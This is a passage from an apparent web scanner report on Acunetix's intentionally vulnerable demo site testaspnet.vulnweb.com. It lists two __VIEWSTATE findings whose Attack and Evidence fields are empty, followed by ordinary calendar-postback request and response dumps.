vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8548&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBA83oOX9sIZGRkG0Gy25gvhjWrx961sZJiH4r03aM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKjweeODQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMFpLljTh9nx5SbVMQLT4uKHrND0Q%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:48 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBA83oOX9sIZGRkG0Gy25gvhjWrx961sZJiH4r03aM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKjweeODQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMFpLljTh9nx5SbVMQLT4uKHrND0Q=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:White" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8564&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBAjyGha9sIZGRkiSTF0CNTEoT%2F9jnLFZSTUn2aqxs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKF2L%2FrBgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMW18HrtDLvBI69w72FeWLatQuMJY%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:40:05 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBAjyGha9sIZGRkiSTF0CNTEoT/9jnLFZSTUn2aqxs=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKF2L/rBgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMW18HrtDLvBI69w72FeWLatQuMJY=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:White" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable 